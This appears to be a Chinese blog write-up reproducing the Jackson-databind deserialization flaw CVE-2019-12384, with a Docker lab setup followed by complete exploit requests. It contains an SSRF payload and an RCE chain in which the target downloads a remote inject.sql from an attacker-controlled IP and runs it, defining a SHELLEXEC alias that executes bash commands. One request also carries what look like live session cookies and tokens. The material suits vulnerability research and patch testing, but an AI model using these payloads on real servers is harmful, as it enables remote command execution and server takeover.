前言

由於Jackson黑名單過濾不完整而導致，當開發人員在應用程序中通過ObjectMapper對象調用enableDefaultTyping方法時，程序就會受到此漏洞的影響，攻擊者就可利用構造的包含有惡意代碼的json數據包對應用進行攻擊，直接獲取服務器控制權限。

影響版本

Jackson-databind 2.0.0 ~2.9.9.1

環境搭建

創建一個docker-compose.yml的文件

version: '2'

services:

  web:

    image: tech1iu/servlet-with-jackson:2.9.8

    container_name: jackson-fuckme

    ports:

      -  "8080:8080"

然後使用docker安裝docker-compose up -d

訪問http://your-IP:8080/fuckme

漏洞復現

SSRF

發生數據包

POST /fuckme HTTP/1.1
Host: your-IP:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: pro_end=-1; ltd_end=-1; order=id%20desc; memSize=2978; sites_path=/www/wwwroot; serverType=nginx; backup_path=/www/backup; force=0; load_page=null; load_search=undefined; pnull=nullnot_load; uploadSize=1073741824; rank=a; SetName=; site_type=-1; ChangePath=3; vcodesum=9; SESScc3cfa2752cb20299766315b04dc7f8a=DUjfNVloT1dZgF2MyF2qjBGeEIPVWnRLF2aOvs7q808; request_token=S3WKG02B2DYSeyCaHQrfoZQfUirBwH1eq6sg9SYYhZnrvWFN; softType=10; load_type=10; Path=/www/server/panel/plugin/free_waf; aceEditor=%7B%22fontSize%22%3A%2213px%22%2C%22theme%22%3A%22monokai%22%7D
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 113

poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://192.168.220.137:1888/~/test"}]

RCE

惡意文件inject.sql內容如下：

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('ping 1.1.1.1')

構建數據包

POST /fuckme HTTP/1.1
Host: your-IP:8080
Proxy-Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.80.133:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 169
Content-Type: application/x-www-form-urlencoded

poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.220.137:8080/inject.sql'"}]

的確有ping數據包

從反序列化->SSRF->RCE

Jackson 遠程命令執行漏洞（CVE-2019-12384）

前言

影響版本

Jackson-databind 2.0.0 ~2.9.9.1

環境搭建

漏洞復現

SSRF

RCE

CVE-2020-0787復現

Jackson 遠程命令執行漏洞（CVE-2019-12384）

Nexus Repository Manager 3 遠程命令執行漏洞（CVE-2020-10199）

Apache Tomcat 反序列化代碼執行漏洞復現(CVE-2020-9484)

PostgreSQL 提權漏洞（CVE-2018-1058）

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結